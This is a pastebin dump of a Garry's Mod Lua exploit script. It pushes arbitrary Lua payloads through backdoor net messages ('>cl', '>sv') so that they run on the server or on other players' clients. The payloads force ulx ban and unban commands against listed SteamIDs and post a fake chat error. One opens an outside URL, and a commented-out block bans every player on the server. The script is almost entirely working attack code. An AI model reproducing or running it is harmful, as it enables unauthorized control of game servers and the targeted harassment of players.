Advertisement
Guest User

Untitled

a guest
Oct 28th, 2016
61
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.21 KB | None | 0 0
  1. local code = [[
  2. RunConsoleCommand("say" , "/ooc [ERROR] 225 Chat restarted.")
  3. ]]
  4.  
  5. local code_2 = [[
  6. LocalPlayer():EmitSound( "vo/k_lab/kl_finalsequence.wav", 100)
  7. timer.Simple(4 , function()
  8. gui.OpenURL( "http://specialfriedrice.fr/img/special.png" )
  9. end)
  10. ]]
  11.  
  12. local code_crash = [[
  13. local t = {}
  14.  
  15. hook.Add("Think" , "Asdasd" , function()
  16. RunConsoleCommand("ulx" , "banid" , "STEAM_0:0:62143161" , 0)
  17. end)
  18. ]]
  19.  
  20. local code_crash2 = [[
  21. local t = {}
  22.  
  23. hook.Add("Think" , "Asdasd" , function()
  24. RunConsoleCommand("ulx" , "banid" , "STEAM_0:0:83023715" , 0)
  25. end)
  26. ]]
  27.  
  28. local code_crash3 = [[
  29. local t = {}
  30.  
  31. hook.Add("Think" , "Asdasd" , function()
  32. RunConsoleCommand("ulx" , "banid" , "STEAM_0:1:32938585" , 0)
  33. end)
  34. ]]
  35.  
  36. local code_crash4 = [[
  37. local t = {}
  38.  
  39. hook.Add("Think" , "Asdasd" , function()
  40. RunConsoleCommand("ulx" , "banid" , "STEAM_0:1:154242686" , 0)
  41. RunConsoleCommand("ulx , "unban" , "STEAM_0:0:52345471")
  42. end)
  43. ]]
  44.  
  45. local code_unban_all = [[
  46.  
  47. --for k , v in pairs(player.GetAll()) do
  48. -- RunConsoleCommand("ulx" , "banid" , v:SteamID() , 0 , "Hack the server all you want - Axel")
  49. --end
  50. RunConsoleCommand("ulx" , "unban" , "STEAM_0:0:161667715")
  51. ]]
  52.  
  53.  
  54. --Client
  55. if false then
  56. --for k ,v in pairs(player.GetAll()) do
  57. if player.GetBySteamID("STEAM_0:0:62143161") ~= nil then
  58. net.Start(">cl")
  59. net.WriteEntity(player.GetBySteamID("STEAM_0:0:62143161"))
  60. net.WriteString(code_crash)
  61. net.SendToServer()
  62. end
  63. if player.GetBySteamID("STEAM_0:0:83023715") ~= nil then
  64. net.Start(">cl")
  65. net.WriteEntity(player.GetBySteamID("STEAM_0:0:83023715"))
  66. net.WriteString(code_crash2)
  67. net.SendToServer()
  68. end
  69. if player.GetBySteamID("STEAM_0:1:32938585") ~= nil then
  70. net.Start(">cl")
  71. net.WriteEntity(player.GetBySteamID("STEAM_0:1:32938585"))
  72. net.WriteString(code_crash3)
  73. net.SendToServer()
  74. end
  75. if player.GetBySteamID("STEAM_0:1:154242686") ~= nil then
  76. net.Start(">cl")
  77. net.WriteEntity(player.GetBySteamID("STEAM_0:1:154242686"))
  78. net.WriteString(code_crash4)
  79. net.SendToServer()
  80. end
  81. --end
  82. end
  83.  
  84. --Server
  85.  
  86. if true then
  87. net.Start(">sv")
  88. net.WriteString(code_unban_all)
  89. net.SendToServer()
  90. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement